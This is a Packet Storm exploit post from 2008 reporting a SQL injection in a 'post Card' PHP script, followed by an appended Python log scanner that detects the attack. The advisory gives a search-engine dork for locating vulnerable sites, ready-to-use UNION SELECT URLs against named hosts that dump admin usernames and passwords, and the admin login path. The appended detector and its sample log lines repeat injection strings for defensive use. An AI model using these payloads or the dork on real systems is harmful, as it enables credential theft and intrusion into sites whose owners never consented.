postcard-sql.txt

2008-11-04T00:00:00
ID PACKETSTORM:71537
Type packetstorm
Reporter Hussin X
Modified 2008-11-04T00:00:00

Description

                                        
`post Card ( catid ) Remote SQL Injection Vulnerability  
___________________________________  
  
Author: Hussin X  
  
Home : www.IQ-TY.com & www.TrYaG.cc  
  
MaiL : darkangeL_G85@Yahoo.CoM  
___________________________________  
  
script : http://webbdomain.com/php/postcarden/index2.php  
script : http://webbdomain.com/php/postcardir/index2.php  
  
DorK : inurl:choosecard.php?catid=  
_____  
  
ExploiT & Demo  
_______  
  
post Card v 1.01  
  
http://webbdomain.com/php/postcarden/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--  
  
  
post Card v 1.02  
http://webbdomain.com/php/postcardir/choosecard.php?catid=-1002+union+select+concat(username,0x3a,password),2,3+from+admin--  
  
  
Note : Exploit in Properties Picture  
  
  
Login :  
______  
/admin  
  
  
  
  
Greetz : All my friends  
  
  
Im IraQi | Im TrYaGi  
  
`
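
A detection sketch for the request pattern shown in the advisory, added here as an example that is not part of the original post: it flags access-log requests to choosecard.php whose catid value is not a plain non-negative integer. The log format, the sample lines, the function names and the rule that a legitimate catid is an integer are all assumptions, since the advisory does not describe the application's code or logging.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a common/combined log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate catid is a short non-negative integer.
VALID_CATID = re.compile(r"\d{1,10}")


def suspicious_catid(log_line):
    """Return the decoded catid if the line is a choosecard.php request
    whose catid is not a plain integer, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/choosecard.php"):
        return None
    # parse_qs decodes %xx and '+' so encoded values are normalised first.
    params = parse_qs(url.query, keep_blank_values=True)
    for value in params.get("catid", []):
        if not VALID_CATID.fullmatch(value):
            return value
    return None


def scan(lines):
    """Return (line_number, catid) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        value = suspicious_catid(line)
        if value is not None:
            hits.append((n, value))
    return hits


# Constructed sample log lines (documentation IP addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [04/Nov/2008:10:00:01 +0000] "GET /php/postcarden/choosecard.php?catid=3 HTTP/1.1" 200 5120',
    '192.0.2.77 - - [04/Nov/2008:10:02:13 +0000] "GET /php/postcarden/choosecard.php?catid=-1002+union+select+1,2,3-- HTTP/1.1" 200 4890',
    '192.0.2.77 - - [04/Nov/2008:10:02:40 +0000] "GET /php/postcardir/choosecard.php?catid=7%20or%201%3D1 HTTP/1.1" 200 4890',
    '192.0.2.10 - - [04/Nov/2008:10:03:02 +0000] "GET /php/postcarden/index2.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, value in scan(SAMPLE_LOG):
        print(f"line {n}: non-integer catid {value!r}")
```

The same integer rule, enforced in the application before the value reaches a query and combined with parameterised statements, removes the condition the log check is looking for.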